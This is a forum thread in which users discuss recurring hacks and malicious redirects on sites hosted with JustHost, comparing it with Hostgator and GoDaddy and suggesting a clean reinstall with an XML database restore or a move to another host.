            But yes if it is happening because old site backups are being restored, then doing a new clean install and restoring the site via XML DB can work, because there won't be any malicious code restored via the php files or infected MySQL DB. It will be all fresh, clean, a completely new install.
  • Profile picture of the author mosthost
    I would move hosts and try an XML DB restore like Oranges said. Fact is, if the host has their PHP.INI set up right, this can't even happen. That's why managed hosting is always a good idea.

    9 times out of 10 they used a plugin to get in.
    • Profile picture of the author Mike Anthony
      Originally Posted by mosthost View Post

      I would move hosts and try an XML DB restore like Oranges said.
      Or that. I'd definitely be out of there. Yo Most digging the sig. Oh the irony. ROFL.
  • Profile picture of the author John34
    I don't think it's an issue with Justhost, I myself got 6 sites hosted with them from last 8 months and never faced any issue.
    • Profile picture of the author nik0
      Banned
      Originally Posted by John34 View Post

      I don't think it's an issue with Justhost, I myself got 6 sites hosted with them from last 8 months and never faced any issue.
      I also had no problems for the first 4 months.

      Obviously it can have tons of reasons but when you get the support saying that it's a Google cache problem cause when he typed in the URL in the address bar he didn't get redirected and DID get redirected when he searched my site from Google, while explaining a ton of times that it's NOT a cache problem, then I'm getting pretty mad. It's also totally worthless that they don't have any virus checking on their hostings. Many have already confirmed that Hostgator solves these issues in minutes and I have to spend countless hours/days to get things fixed.
  • Profile picture of the author vidrine
    1) Since I've been with JustHost, ALL my sites have been hacked twice. Of course, their answer was that I must have given out my password to someone, which is bollocks.
    2) They have changed my fixed IP address TWICE without notifying me, which, of course totally defeats the purpose of purchasing an IP address.
    3) Since that last fiasco, I moved everything to GoDaddy, which I've NEVER had issues with.
    4) Got an email today that I've again been hacked and they "disabled" my account. Even though I am no longer using the account, I checked into it ... in case I might need it again (HAH!)
    5) They would not delete the supposedly offending files, but only leave me a ".malware.txt" file listing supposedly hacked files. Three files were indeed hacked, which were phishing. The dozens of other files listed were fine and untouched.
    6) I called back to inform them that the hacked files were removed. They again "scanned" the sites, then told me that there were numerous hacked files remaining.
    7) Apparently, they have problems differentiating between "good" and "bad" scripts, and are willing to leave you JustHanging out there.

    Thankfully, I have everything sound and secure on GoDaddy's sites, and JustHost will never, ever, get another nickel from me. When a site that isn't even online gets hacked .... what else could it be but the host?
    • Profile picture of the author Nelapsi
      Originally Posted by vidrine View Post

      Thankfully, I have everything sound and secure on GoDaddy's sites, and JustHost will never, ever, get another nickel from me. When a site that isn't even online gets hacked .... what else could it be but the host?
      And on Godaddy.. the server I was on was hacked once and then had another client on the box taking up all the resources which was causing my site to generate 500 errors (and a few other clients). Godaddy solution, I upgrade to a VPS. I went for a refund rather than an upgrade.